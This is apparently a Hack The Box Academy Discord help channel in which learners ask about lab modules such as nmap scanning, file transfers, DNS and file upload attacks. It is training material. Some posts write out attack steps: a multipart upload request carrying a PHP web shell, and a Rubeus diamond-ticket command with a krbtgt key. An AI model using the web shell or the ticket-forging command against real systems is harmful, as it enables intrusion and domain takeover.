#modules

That is not right, you need to spawn the target and scan the target's IP.

You don't scan the IP range of your VPN's subnet, the target is on another subnet

correct..
i missed the target spawn point because it was on another section, thanks 😄 ..

but this doesn't satify my original question, why were the results inconsistent between host discovery scans in the real world scenario?

You don't want the password. You want the admin key. Keep trying to enumerate that from the LLM

Hi, in the "API ATTACKS" module (HTB ACADEMY), "Broken Object Property Level Authorization" section, I need help with the last question:
"Exploit another Mass Assignment vulnerability and submit the flag."
I know the hint gives you two endpoints: "Focus on the POST /api/v1/customers/orders and /api/v1/customers/orders/items endpoints." But I don't see how those two endpoints can help me. I think I'm missing more. Any suggestions?

actually, there's no spawn required

the question asks: Based on the last result... (this is referring to from the reading)

as a general tip of advice; if there is no target to spawn: the context is in the reading

the RCVD line is what would key you in

yeah right, i didn't need to spawn anything to answer the question, my question wasn't regarding the practice question on the first place, but SuperNuts note on my mistake that i scanned my own network is what i found worth notifing.

yeah scanning anything was not required

yep, but still didn't satify my curiosity on why weren't the results consistent

wdym "results not consistent?"

i scanned my local network hosts using nmap 192.168.1.0/24 -sn, sometimes it returned 2 hosts, sometimes 3, sometimes 6

if you're scanning your own network it's likely there's some other stuff in play that's not responding in a timely manner

or a device may have connected to the network i.e. someone turned on a computer, a tv was turned on, etc.

the devices i was aiming to discover are connected in all instances of testing

but scanning a home network is in general not gonna be as consistent as a corporate network

so i'm very sure all devices were online

i.e. Windows doesn't allow ICMP discovery by default

as far as why a random amount of devices additionally discovered: did you log in to your router and check the devices that are assigned?

hmm..
i can ping a specific IP address (using ICMP). nmap uses ICMP when i force the -PE option, but still doesn't discover the same IP i was able to ping right before nmap command.

yes

i wouldn't think too hard about it tbh; it works in most other instances you'll use it ¯_(ツ)_/¯

i have 6 devices that are always online, i can ping all of them using ping command, but not always discovered using nmap

you'll get yourself too caught up on this to move forward with learning

could just be that they didn't respond to the ping request

¯_(ツ)_/¯

i.e. timed out

i thought this maybe the case, so i increased the max tries to 3 when using nmap

you may be right 🥲

the retries is for port discovery, not for Echo Requests

aaah 🙂

https://nmap.org/book/man-performance.html

thanks for the indication :).. didn't know that

RTD - Read The Docs

:D

(or the more rude, RTFM - Read The Fuckingancy Manual)

its so overwhelming at first with all of the options

so am i supposed to assume that the results are inconsistent due to being a local network? and this is not the regular case in real world corporate networks?

Check the roles for the creds provided for that question. Check the endpoints from the hint for required roles and see if any apply for the user you have. Then you have to just piece things together.

Correct

Let's try not to spoil content

Ok then, I'm having trouble with the second endpoint that provides the clue, but I can't find the necessary fields to fill them out. Is there any other endpoint you suggest checking to join?

Because the final 2 points the clue gives me are not enough, and I've even checked the roles, but I feel like I'm forgetting something.

You can just DM, as I don't think there's really a way to discuss this without spoiling content. Actually, look at the roles that user has and then check out the endpoints in the hint. There should be one specific role that you should focus on.

hey guys, why are these 2 tabs not redirecting me to the pages?

Works for me. Might be an issue on your end.

huh weird 🤔

I'm getting the drop-down menu.

@inland shoal might wanna try clearing your cache/logging out and logging back in, the standard stuff. If you still can't, just try another browser I guess xD 😂

yep trying to relogin 😂 the classic

bro tf my logout is broken too LMAO

Clear cookies and all site data. See if that works.

nope did not work, gonna try it tomorrow ig

Btw it's the same for me:

I was able to logout tho, welp, now I gotta log back in 😂

ok the stuff worked on my firefox, definitely Brave going nuts jn

thanks for the help at least @normal sand 🔥

Ahhh, I see. P.S. I was using Firefox.

?

the module teaches you how to utilize pivots iirc, you don't need to necessarily do the pivoting module; as far as the scanning, proxychains sucks most of the time

Currently going through this! A lot of these modules don't require a target spawn as the answers are within the text - and getting things to work has been a PITA to try and run through it to help make sense of what that "chapter" was about

Speaking of this issue ^ any idea how to transfer a payload to windows machine for Socat Bind Shell Redirection?

can u drop a hint or two i can access one of the hosts but no idea how to move further

Hi i need help in shells web php

Shell web app module

Y dont find user and password of rconfig server

do you have any tips for this? https://academy.hackthebox.com/module/110/section/1055
for the first one

i literally feel like it's gambling now, I || sent it to burp repeater and spam click until the response size is bigger than 808 but spent last 5 mins like that and it's not working ||

Working on the "File Transfers" in the "Windows File Transfer Methods" section. It has a bit telling us to use SMB to upload files from our target to our attack machine. First I tried this on the PwnBox. However WebDav needs to use port 80 and doesn't support using other ports per their docs. The PwnBox is already using port 80. So then I tried using my own VM. I was able to download and start WebDav on port 80 on my VM. On the target (Windows) machine I am able to open firefox and navigate to my attack box IP and see all the files. So it looks like WebDav is running correctly. However when I try to connect to it via the CLI I get the following:

C:\Users\htb-student>dir \\10.10.15.119\DavWWWRoot
The network path was not found.

C:\Users\htb-student>dir \\10.10.15.119\Downloads
The network path was not found.

C:\Users\htb-student>dir \\10.10.15.119
The filename, directory name, or volume label syntax is incorrect.

C:\Users\htb-student>dir \\10.10.15.119\
The specified path is invalid.

If I could use the web UI to upload I would, but that doesn't seem possible. Looks like you can't use iwr either to upload.

The command that the lesson suggests is:

copy C:\path\to\file \\10.10.15.119\DavWWWRoot\
copy C:\path\to\file \\10.10.15.119\Downloads\

Any pointers as to what is going wrong?

webdav is just a pain in the ass

Lol, noted. Also I have noticed that iwr to the internet is basically shut down from the CLI. I can iwr to my VM.... but not to github. So maybe the VM just doesn't allow it.... Seems dumb to have the VM attached to this lesson not allow replicating the commands in the lesson though.....

Probably something has changed, but there is no .viminfo file in the other users' directories.

Did you try to execute my command ?

the targets have no internet access, this is by design

Why is that "by design" when almost the entire module is teaching how to use http/https to do file transfers?

"by design" means that the targets don't have access to the outside world; so any tools you'll need would either have to already exist on it or be compiled/transferred over

they are on a segregated network, generally

and the ones on docker containers are also heavily limited

Running into an Segmentation fault (core dumped) on AEN, if anyone is able to provide more assistance I can share more.

UPDATE: Figured out the issue

There is also a question in the next section:

Upload the attached file named upload_nix.zip to the target using the method of your choice. Once uploaded, SSH to the box, extract the file, and run `hasher <extracted file>` from the command line. Submit the generated hash as your answer.

But once you upload the file, the unzip command is not found on the target machine and you can't install it.... which makes it hard to do. I eventually used a python module to unzip it....

gunzip?

or unzip it before transfer?

gunzip doesn't work on zip files if unzip isn't first installed on the machine. And yes you could unzip before transferring it. You could run hasher on it and not transfer it at all as well. But the question clearly says to (1) transfer, then (2) extract, then (3) run hasher.

guys can anyone lend a hand - Using Web Proxies
Page 10
Burp Intruder
Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag. ive legit tried as many word lists ... the only thing coming back with a 200 OK is index.html but i dont where i would find the flag, ive checked page source and it shows nothing what am i missing here ?

it's your username or real name, whichever you choose

maybe you are not fuzzing for §filename§.html but §filename§
fuzz for §filename§.html
so the endpoint is /admin/§filename§.html

yes...

Are there any people who can give advice on completing the task 'Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer.' in the section https://academy.hackthebox.com/module/51/section/1592? I honestly don’t know what to do anymore...

DM me

thank you but ive tried that

I want support for hackthebox

How do you get added into ProLabs chat I bought it last week and stuck on a machine

Dante

Do you have url encoding off?

Hi I need help in shel web app module
I don't find user and password of rconfig server

a

Is there any way to get the roles?

'HackTheBox-Noob'

If you still need help DM me

Do active boxes and challenges and you rankup
https://help.hackthebox.com/en/articles/5185158-introduction-to-hack-the-box

please read #welcome

they just giving the example of this vuln or they give this example from teh lab exercise coz i can't find many of the example not in labs them in previous exercise

the exercise question is just a theory question can't even use it what learned on the labs just have to give the ans without using the content in practical

@blissful elm Please take care not to post content from modules above tier 0

how would i ask about that

what if i had to show picture then where to ask

Hi! In what module teach how to perform a SMB Relay Attack? It looks like AD Enum & Attacks is not the case

hello, where to ask query for above tier 0 modules

Ask here. Just don't reveal content. Remember anyone who has done the module and knows the answer doesn't need the extra context, they already know what to do. If you feel like you need to reveal more details you can ask to take it to DM.

Password attacks pass the certificate

Nn

HTB Module is not working, anyone know how to resolve without having internet access on the box?
Module: Automated Evil Twin Attacs -> Using Fluxion

Hmmm no, in that section is NTLM Relay

Then I guess it is not part of cpts and is in tier 3 module relay attacks

I guess is not touched in any module so far

yeah more in depth NTLM relay

Anyone can help me with the skill assessment from Advanced SQL injection? I'm stuck

what is the average time to complete a module? 1 week? 3 weeks for the longest modules?

it depends

not all modules are created equal (see: tiering) and not everyone has an easy time of applying the reading

hmmm I see

What is checked first in the DNS resolution process when you enter a domain name into a browser? (Format: Two words)

need help on network foundation

what section?

Domain Name System (DNS)

reread the subsection titled DNS Resolution Process (Domain Translation)

i typed the answer and it didn twork

look closely at Step 2

Hey, im working on module/204/section/2230 the LDAP - Data Exfiltration & Blind Exploitation question - i cant get the wildcard to work at all when prefixed with a character (e.g. "a*") - am i able to get a hint? is the password not able to be exfiltrated? even the provided htb-stdnt user and password which work, dont work when using the wildcard.

module/n/section/y isn't helpful at all

just say the module name and section name

helps others figure at a glance if they've already done it

Alright, the module name is injection attacks 🙂

i did find the flag, but i dont understand why i cant find the passwords as well :/ why would * work, by A* doesnt when i know the password starts with A?

Hey all, I'm struggling on 'Web Services & API Attacks" at the Skills Assessment. I'm having a hard time understanding how to form the SOAP call into a curl request. Does anyone have any suggestions on further reading that might help me better understand?

what is this error while i scan with gobuster

i think was due to hight concurrency

thank you its resolved

Windows lateral movement. The last question. I have access via vnc but I can't find the final path to the DC? Any help?

On the final skill assessment

Hi everyone, I am working on the Web Attacks, doing Bypassing Basic Authentication. I am doing the following to get the methods supported by the server, but is not giving any result:

Is this normal behaviour?

testing it on my end.

Yes, that's what I recieved as well.

My hypothesis is that page doesn't have anything defined to return for Options requests.

It might be that PHP is serving the page directly.

Just reading through that module: it even says that's what you're supposed to get.

Yes, i tried with HEAD but anyways is not bypassing the authentication. Maybe I missed something

Yeah, it was kind of difficult for me to wrap my brain around, as well. Give it another read-through.

Thanks I got it. It was too obvious for me 🙂

I need help for this: https://academy.hackthebox.com/module/306/section/3581

Also need help on this: https://academy.hackthebox.com/module/85/section/908#questionsDiv

so, the best way to get help for modules you're working on is:

• Module Name
• Section Name
• Question you're struggling with
• Generally what you've tried (while avoiding spoilers, i.e. logged in as j* and couldn't find anything)

this solved

okay will try next time

Hi everyone, I just managed to create a fairly well-made pipeline that solves the third question of the Filter Contents section in the Linux Fundamentals module:
"Use cURL from your Pwnbox (not the target machine) to obtain the source code of the https://www.inlanefreight.com/ website and filter all unique paths (https://www.inlanefreight.com/directory or /another/directory) of that domain. Submit the number of these paths as the answer."
My solution:

curl -s https://www.inlanefreight.com/ | grep -Eo "(https?://)?(www.)?inlanefreight.com[^"?<#%']+" | sort -u | wc -l

I'm wondering if one of you more experienced folks could take a look and let me know if there's a better way (like a more efficient regex) to solve it, or if there are any edge cases where my regex might fail that I haven’t considered?

in Network Enumeration with nmap Module, Host and Port Scanning section https://academy.hackthebox.com/module/19/section/102.

i spawned the target for testing with the IP 10.129.45.245, i can access the target using the url http://10.129.45.245/.

problem:
i can't ping the target IP (doesn't exist), nor discover its ports using nmap 10.129.45.245 -sV, nmap 10.129.45.245 -sV -Pn. the results are always (filtered) for all of the first 1000 ports.
what am i missing here?

are you connected to the vpn?

wait i didn't see where you have the http access

do you have the vpn and the pwnbox running at the same time?

Yeah, i can access the web page of the target, it is the basic apache server home page

Nope

since it's asking for TCP -- -sT

Hello. I'm stuck on the third question in the Native Code tab of the Android fundamentals module. I'm leaving the relevant link. I'd appreciate it if you could help me, thank you.https://academy.hackthebox.com/module/195/section/2182

What is asking for TCP exactly?
Do u mean i should scan for ports using tcp packets?

Hey! I need some help with File Upload Attacks > Type Filters

the Question at the bottom is the following:
" The above server employs Client-Side, Blacklist, Whitelist, Content-Type, and MIME-Type filters to ensure the uploaded file is an image. Try to combine all of the attacks you learned so far to bypass these filters and upload a PHP file and read the flag at "/flag.txt" "

I have achieved successful file upload, and the page references the uploaded file after refreshing, but if I then go the referenced path it returns a 404.

for extra info: this is the request that I used:

||POST /upload.php HTTP/1.1
Host: 94.237.50.221:55446
Content-Length: 244
X-Requested-With: XMLHttpRequest
Accept-Language: en-GB,en;q=0.9
Accept: /
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLFRXiJEqnwAojr3P
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Origin: http://94.237.50.221:55446
Referer: http://94.237.50.221:55446/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

------WebKitFormBoundaryLFRXiJEqnwAojr3P
Content-Disposition: form-data; name="uploadFile"; filename="simplewebshell.phtml%00.gif"
Content-Type: image/gif

GIF8
<?php system($_REQUEST[cmd]); ?>
------WebKitFormBoundaryLFRXiJEqnwAojr3P--
||

This returned:

HTTP/1.1 200 OK
Date: Thu, 24 Jul 2025 10:24:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 26
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

File successfully uploaded

what am I doing wrong exactly? Why can I not go to this file after succesful upload?

I'm mainly confused why the upload is a success but then the file does not exist

Find all TCP ports on your target. Submit the total number of found TCP ports as the answer. <--

nullbyte payloads are terrible, try another method

Alright, I'll give some others a try

can you elaborate why they are terrible btw? I'm interested in what exactly is going wrong

I'm not asking about the practice questions, it is a question regarding the content of the section

i'm saying: Did you try doing an nmap -sT scan

Ah, i will test it

if you change vpn regions and it still doesn't scan properly, reach out to support

hey i have doubt from the para in the module
https://academy.hackthebox.com/module/112/section/1069

the module says :
Authoritative name servers hold authority for a particular zone. They only answer queries from their area of responsibility, and their information is binding. If an authoritative name server cannot answer a client's query, the root name server takes over at that point. Based on the country, company, etc., authoritative nameservers provide answers to recursive DNS nameservers, assisting in finding the specific web server(s).

That paragraph wrongly said:

“If an authoritative name server cannot answer a query, the root server takes over…”

Actually, root servers come first, not later.
The correct order is:

Recursive Resolver → Root → TLD → Authoritative → Final IP
if im not wrong so how do i understand this ?

Google: "How DNS works" cloudflare has a decent knowledge base

Okay I finally found an extension that actually works!

@fathom pendant do you mind explaining (or linking me a resource) why nullbyte payloads suck? I'm not very familiar so would love to know :)

they're just annoying to deal with more than anything

alright fair enough :p

thanks!

Hello. I'm stuck on the third question in the Native Code tab of the Android fundamentals module. I'm leaving the relevant link. I'd appreciate it if you could help me, thank you.https://academy.hackthebox.com/module/195/section/2182

Yeah basically even cloudflare doesn't tell what happens when when authoritative name servers fail to resolve

Anyone from the gulf? I'm from bahrain and I want a study partner 😩

Has anyone taken the course at https://academy.hackthebox.com/module/51/section/1592? I’ve been stuck on the task 'Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer.' for about a week now. Can someone give me a hint?

Did you complete this? Been trying for an age now...had various flags out but none of them are correct...

Intro to C2 Operations with Sliver - The Domain Controller Compromise section I can not a diamond ticket to work. Here is the section:

Diamond Ticket

A diamond ticket is also a TGT that can be used to impersonate any user and access any service in the domain. A golden ticket is signed and encrypted by krbtgt's credential, while a diamond ticket is made by modifying a legitimate TGT issued by the domain controller. After requesting a legitimate TGT, the modification can be done by decrypting the TGT with krbtgt's credential, changing specific fields, and encrypting it.

We supplied the target user carrot, carrot's RID, RID of the group "Domain Admins", and krbtgt's AES256.

Here is the command:

sliver (http-beacon) > execute-assembly /home/htb-ac-1008/Rubeus.exe diamond /tgtdeleg /ticketuser:carrot /ticketuserid:1114 /group:512 /krbkey:f2a363997e7539b83637c12d872600a2b4c2727f2ebd35229d33dd85bdc11ed8 /nowrap

I obviously change the path to Rubeus.exe to match my machine

From the Hacker recipe website:
There seems to be some flags missing in the command from the module based on the example here. I know you don't need all the flags but I can't get this to work at all even using all the command flags.

Yo! What’s up guys? 💪
Just dropped into this server like a protein shake in a blenderready to mix it up! I’m here to grow muscle, master skills, and maybe even unlock a few life achievements along the way. Whether it’s lifting heavy, moving smart, or just figuring out how to do one clean pull-up without questioning my existence I'm down for the grind.
Not here to be perfect just better than yesterday. So if you’ve got tips, routines, memes, or just good vibes, throw ‘em my way. Let’s train hard, laugh harder, and level up together.

Working on Attacking Enterprise Network, using my own VM and connecting. Trying to find a way to make the connection more consistent, it takes about 5 min to tunnel through the foothold device and load anything in browswr

I'm stuck on Nmap Firewall and IDS/IPS Evasion - Hard Lab

What I'm missing anyone can point it ?? i found open UDP port 137 but after that I stuck

try scanning through DNS port

This is the hint that said "Our client also mentioned that they were forced to add a service that plays a vital role for their customer because they require large amounts of data."

-> Because this service is critical so it's very likely that this service only accepts connection from certain port. So doing typical scanning will get blocked because those ports are ephemeral ports. Look at this section again "https://academy.hackthebox.com/module/19/section/106" to see what else could you do

Hope this would shed some light on.

https://academy.hackthebox.com/module/112/section/1069 I need help with the question: What is the FQDN of the host where the last octet ends with "x.x.x.203"? I used DIG - AXFR Zone Transfer and DIG - AXFR Zone Transfer - Internal, as well as brute-forcing inlanefreight.htb (which only found three domains), but still couldn't find x.x.x.203

I used desenum, but still only had
ns.inlanefreight.htb.
mail1.inlanefreight.htb.
app.inlanefreight.htb.
I also thought about blasting the vpn.internal.inlanefreight.htb behind, but I didn't find anything

when i download the fatty-server.jar from attacking web applications vulnerabilities in thick client Applications section i get invalid or corrupt jar file anyone knows why

this is from attacking common applications module

You can try with different wordlist.

Is this the only place to ask for help? Has anyone been able to get this to work.

I made this toolkit to help with bug bounty recon, who knows it might be useful

Was it after modification?

i followed the steps and downlaoded same as in the module

You can look up ipsec's video on fatty for some help with that section

I tried other wordlists but couldn't find it either.

hi

Can anyone help me?

Thanks @full echo you really saved my day I got it what I missed

Can you show me how you did the zone transfer?

Send you a private message?

Sorry It's been awhile since I finished this module. If the file is corrupted, it could have something to do with the signature.
Can you check this part one more time?

dig axfr inlanefreight.htb 和dig axfr internal.inlanefreight.htb

Im stuck on RCE part of advanced sql injections. Installing postgresql-server-dev-13 doesnt work anymore. Did anyone manage to go around this? 🙏

From the context of the eric user -

I just checked my notes for this section of the module and I don't have anything documented, so it might not have worked for me either.

So, the issue is that the user carrot is not configured for delegate. It's just an example

funny that it's the only example in that section that uses Sliver besides the PTT part in the beginning.

Yeah I think since I already had the answer from a previous section, I just documented the content in my notes and called it good.

I have all the questions answered but I want to get the diamond ticket to work.

from Sliver

Could always try to use creds to access the host and see if you can configure things to make it work. Not sure if the lab is setup to now allow that, but figure if you have the right creds you should be able to.

Yeah I just don't know why it's even in the training if it doesn't work in the lab

Well I know some parts of labs are just informational, but would be cool to replicate it and ensure things on your end work or don't work. You could always use feedback to submit a recommendation or create an erratum if you believe it is something that should work and doesn't.

Right, I agree replication is great.

Detecting Windows Attacks with Splunk in the Detecting Pass-the-Hash section. Even after following the query in the steps and getting exactly where HTB show you. It asks you to put the answer of the ComputerName. No matter what I try, it still says it's incorrect?? Anyone know what is going wrong?

hi anyone i can dm for ""Hacking Wordpress" module at the very final flag of the final section which demands: Obtain a shell on the system and submit the contents of the flag in the /home/erika directory."

You need to add computername as an attribute to your stats count by operation if that makes sense

Dm me

Thanks for the reply…no need I managed to solve it 👍👍👍

Great!

Hi, I'm doing the password cracking module and I've been blocked from cracking protected file for 3/4 days. Can you give me some advice?

I'm not very experienced in this world that I've just started learning seriously. Should I start with something easier?

I try to see what was shown to me in the module section and I try to do what it tells me and to think about what I should do to make you understand where to crack a zip file. I tried to do what the module told me and do searches with Google but every time I can't finish the module.

I cant visit them for some reason

i tried visiting "http://localhost:5901" didn't work, included the ip in hosts file also.
Network Foundations, skills assessment

Anyone found any workaround for the constant rpc error: code = Unknown desc = implant timeout in the sliver module?

I can't crack the zip file. I try to use all the material provided by hack the box but every time it doesn't work. I tried to extract the file with unzip to see the file extensions and other ways to crack it but it doesn't work.

yeah i did so dw

Check dm

I don't know if it's worth it for me to change the module and go to an easier module and come back to that one in the future

@uneven obsidian Please do not reveal content from modules above tier 0

oops sorry

yes i used unzip and the name of file

Hello guys dl you have roadmap to start cyber security+ good resource

May I send you a DM regarding my question?

So... No workaround for the rpc error? https://discordapp.com/channels/473760315293696010/774040263278592041/1397970702191300739

this is what he tells me

no sorry i'm busy rn

ok

Did someone get trouble with this last question of AI Foundamentals- Skill assessment ?? Thanks

What deep learning architecture, known for its ability to process sequential data like text by capturing long-range dependencies between words through self-attention, forms the basis of large language models (LLMs) that can perform tasks such as translation, summarization, question answering, and creative writing? 

thansk for help

someome can assist me with the AEN on a private chat? i found something that i am pretty sure needs to be working

I dont know if i can write here the answare I have in mind, but is the only i have in mind

Someone can assist me please in AEN module, section Web Enumeration & Exploitation ?

I don't even understand the reason for the output

hmm try maybe hashcat -a 3 -m 9600 with it?

.

Hey

I'm new

hi new, im sep

@strange pivot Hi

@sterile hawk Bro hlo

not allowed

Really??

thats not very nice

This server isn't for discussing illegal activity

Welcome to the server. Read through #welcome and follow the provided steps and read the #rules. With that being said, this isn't the server to be asking for help on hacking a friend or any other illegal activity.

Oh thanks

this is the outpout

If running it through hashcat you are going to need to remove the Confidential.xlsx: from the beginning of the hash and also add a wordlist to your command. You can always compare the hash that hashcat expects here: https://hashcat.net/wiki/doku.php?id=example_hashes

ok thanks

can I get some help pls? still stuck on this ty

Hey I deleted your screenshot due to the spoiling information. What module/section are you working on?

I also deleted your screenshot due to spoiling content over Tier0, but you should be good with the hashcat stuff now. If not let me know.

there's also hashid -m

no worries. I'm doing the footprinting module. working on MSSQL section question 2

You are having connection issues when trying to access the MSSQL instance?

Not sure if its connection issue but the error that i'm getting is Name or service not known

You can DM your input/output.

Anyone can give me a hand on the Credential Hunting in Network Shares Module?
Sadly its not possible to connect via RDP or WINRM to the target machine and its the last Answer missing :/

Do the credentials you have authenticate using netexec and the SMB protocol?

yes

Then you should be good.

Normally i should, but i am still not 😂

However either the Pwnbox or my Client are not able to dump stuff via nxc. Also it's not possible to connect via winrm or RDP against the Machine.

Crackmap or nxc are able to authenticate and show the accessible shares but after that there is a dead end and the machine crashes. The module should probably be reworked

I didn't have any issues with the module or that section.

Windows Lateral Movement
Skill Assessment
Last question getting connect to DC
Tried RDP with alternate port to DC with n* and pth. Also tried r*
Tried psexec.py with pth
WinRM not available
What am I missing here?

Did you try using the technology of the password you had to get? I didn't go that route, so I can't say if that is the way. If you have RDP access on that more isolated host, look in plain sight for something that is not present on the other hosts. If none of this makes sense, you can DM.

I appreciate the response ricky. I'll DM as I tried that technology as well just forgot to put it here.

I'm doing easy assessment from Attacking Common Services, I tried:

• nmap
• login to ftp with anonymous
• look through the website
• scan users in smtp with list from this module, and with xato-net-10... wordlist
  So far I can't get any move forward, any tips? I'm probably missing something simple

I'd revisit the smtp content, maybe try different modes for user enumeration.

I tried every mode, but only after some time I found solution.
I terminated machine and spin a new one. Use command which I used before only changed IP and now it is working, ehh

Hi, based on your experience, is it better to focus on a single module and learn it in depth, or to get the basics of several modules and practice on VM?

The modules tend to have practical examples to learn from

And even some of the more in-depth stuff exists in higher tier modules

Stuxbot uploaded and executed mimikatz. Provide the process arguments (what is after .\mimikatz.exe, ...) as your answer.

does anyone know the answer to this, I can't figure this out to save my life.

I can't take the cdsa untill get this question right

best to say which module and section you're on too

Hello any mods available? I think there is a bug on module: https://academy.hackthebox.com/module/147/section/3714
I've sucessfully got the password (which is the only one) but htb stills tell me that this is the wrong answer

Make sure there are no whitespaces

try manually typing it

Also mods arent staff

sorry

made sure of it, still not working

You can DM me what answer you have and I'll tell you if it's correct or not

i just did this like a week ago so it's unlikely that it's broken somehow

weird then

nvm

found it, that was my bad

thanks for the support anyway

Introduction to Threat Hunting & Hunting With Elastic

Page 5

Stuxbot uploaded and executed mimikatz. Provide the process arguments (what is after .\mimikatz.exe, ...) as your answer.

can I please get some help with this

I think for that one you need to search for powershell scriptblocks and find it, you may also be able to find the answer by just searching "mimikatz.exe" in your query

can't remember exactly how i solved this problem but if u filter for event ID 4104 (powershell logs basically) then u should be fine hopefully

Has anyone encountered the issue of this command hanging indefinitely?
"grep -r 'HTB{' / 2>/dev/null"

Is there someone working on this module: Skills Assessment - Password Attacks? I got a foot on the DMZ01 host, but unfortunately, there are no tools there. I have tried all I know to elevate privileges with no luck. I will appreciate a hint.

pivot

Thanks! @fathom pendant I am working on it now!

dns is killing me

can't understand anything

https://academy.hackthebox.com/module/112/section/1069

stuck on the first question

try using dig ns inlanefreight.htb @127.0.0.1 command in the "DIG - Ns Query" section

Or use the "Subdomain Brute Forcing" technique

it's just I don't know what I do

dig is used to enumerate stuff

and I get some sub domains when I use it

but from that I don't understand what's the second step

when you use the command "dig ns inlanefreight.htb @10.129.14.128" what you can see in the ;; ADDITIONAL SECTION:?

I have run into some issues with Sqlmap essentials module.

I’ve finished all the cases and into the shell questions. I got the first flag with cat flag.txt and that’s the only flag I can find.
In the shell I find the flag… but it’s the same flag as the previous question

i think your syntax is just wrong because of quotation placement, the right syntax should be grep -r "HTB{" 2>/dev/null?

I had to go eat I'm back

btw that's also the thing I don't understand what all of this means

question answer sections

oh sorry

look you dm

alright

I understand

what's the platinium badge you have ?

is it because you play season machines ?

nice

are they really hard ?

need help, answer wont work.
Linux Fundamentals
Working with Files and Directories

thats what i done but apparently the dates isnt correct

i mean the filename, it's rly dumb

https://tenor.com/view/robert-redford-jeremiah-johnson-nodding-yes-nod-of-approval-gif-21066931

For, Windows Server Privesc
https://academy.hackthebox.com/module/67/section/912
I try a few exploits without any successes for privesc.
It's always crash or fail to open a session.

Run it from the context of the other user

Aka run it from the terminal

@winter glade your screencap included a flag/answer.

I am stumped on the second question. When i do the directions it is saying... that is the only flag that I can find. The same as the first answer

im able to get into the shell and everything no big deal... then it leads me to the databases and one of the files is flag.txt

however, when i use the cat comand to look at the contents in the file - it returns that same flag for the second answer

This is not the right flag...

I have tried to recall all the folders and there is not a flag anywhere

Please do not reveal contents from modules above tier 0 and do not post flags.

My apologies... I am not sure how to provide intext about what im doing to get help

You can say the module, section, and question you're on. Anyone who has completed the module and who can help has done it and doesn't need pictures or details, they know the attack path etc. You can say what you've tried (without revealing content etc) and take it to DM's if you really feel like you need to reveal something more.

Sounds good. Thank you. My apologies, i didnt mean to reveal anything. That is on me. wont happen again

I am looking for some help on the SQLMaps essentials - the OS Exploration question: Use SQLMap to get an interactive OS shell on the remote host and try to find another flag within the host.

Please DM me if you can help me.

I think I am having a issue with password cracking module cracking protected files the file won’t crack tried a few wordlists

In general use the wordlist provided in the resources or rockyou. If it doesnt crack with either you've done something wrong or it's not meant to be cracked

Got it tricked me

I don’t want to spoil how to fix it

Fixed it just as I asked

Look at the method which returns a string to the Java layer

it makes no sense there's 2?

ok i see why, i didnt do it in their VM

Think you need to ssh in

https://academy.hackthebox.com/module/112/section/1072 Can you help me? Question: Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer. Hint: On systems usernames are often named after the employee's name. We recommend to use the Footprinting-wordlist provided as resource. Remember that some SMTP servers have higher response times. I used smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/Names/names.txt, but it did not return any results. Then I use nmap -p25 --script smtp-enum-users --script-args smtp-enum-users.timeout=10 to get | smtp-enum-users:
| root
| admin
| administrator
| webadmin
| sysadmin
| netadmin
| guest
| user
| web
|_ test
I use these usernames to verify with VRFY in the smtp service, and only root returns 252.2.0.0 root. But the answer submitted by root is wrong. I have no clue, can you help me?

I'm so glad i found this.... The fact that you said this made me hate myself less lmao.

I was so close to passing it, i was at the ../logs part, 4 hours in, just gave up because i was pissed that the jar wouldnt update 😐

Hi

I'am brazilian

Hello Brazilian. Please read #welcome and #rules it will explain how to get verified

Then you can talk in #general

i need some help because I'm starting today

Follow the instructions 👆 👇

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

If you’re stuck on a module, this channel is the place to be

an instance of my HTB does not open eat now and it is not opening for me can complete the module

i need to find the flavor of the Linux operating system by running cat/etc/issue

?

What do you mean by not opening?

the instance does not open the Linux system for me can run the module

You’ll have to connect yourself

Via pwnbox or your own OS

https://academy.hackthebox.com/module/15/section/32

isn't that where I can send a picture to show what's going on?

#modules message

Step 1: Follow instructions

Where could I get help about an issue with a not working module?

Step 2: get permission to share images

Please read #welcome and #rules it will explain how to get verified and then have a look at the channel directory

Thank you

#boxes or if it’s a recent one, there might be a dedicated channel

Its about a module I messed up there haha

i am using translator because my English is weak yet so it is difficult to understand how I do to speak in general

RDP will not work and I have tried it over the course of multiple days with no success

Read the #rules and follow the instructions in #welcome to gain access.

Hi guys,
I think in the module "SQL Injection Fundamentals" the page "Subverting Query Logic" there is a mistake in the explanation of the Injection regarding AND, OR precedence:

"
The AND operator will be evaluated first, and it will return false. Then, the OR operator would be evaluated, and if either of the statements is true, it would return true. Since 1=1 always returns true, this query will return true, and it will grant us access.
"
That is not true I think, because 1=1 is true but will evaluate to false since it is connected with the "AND" password=something. I tested that also with username tom and toms and for tom i get success but for toms not, since it evaluates to non existing user → FALSE
Can someone check this. I hope this is the right channel to pinpoint such things

#1234357888114364508 and although the statement is wrong, the diagram above it is correct. Technically it's only the last sentence that makes no sense.

yes I think so

Hello everyone,

I'm currently stuck on a Hack The Box exercise and could use some assistance. I'm working on the "Wi-Fi Evil Twin Attacks" module, specifically the Skills Assessment section (https://academy.hackthebox.com/module/291/section/3287), and I'm on the very last question: "What credentials are obtained from the Wi-Fi network 'PulseGrid-ENT' (format: username:password)?"

From the provided information and the network type (enterprise as seen in the screenshot), I understand that I should likely be using EAPHammer to set up an evil twin access point to capture credentials, which I anticipate would be transmitted in cleartext via GTC.

However, my main problem is that I'm unable to find any connected clients on the "PulseGrid-ENT" network, even after extensive monitoring. This prevents me from capturing the necessary certificate that EAPHammer needs to create the evil twin. I see other devices on other networks, but not on this specific "PulseGrid-ENT" network.

Has anyone encountered this issue before, or does anyone have any pointers on how to proceed? Any help or guidance would be greatly appreciated!

Thanks in advance!

It was a long run but it's cleared. Thanks to the people that helped here.

Stuck on Windows Privilege Escalation on HTB acdemy in the Pillaging section I got the mozilla cookie for slack but doesnt work?

Be sure to do a complete refresh when you set the cookie, Ctrl + shift + R if that doesn't work:

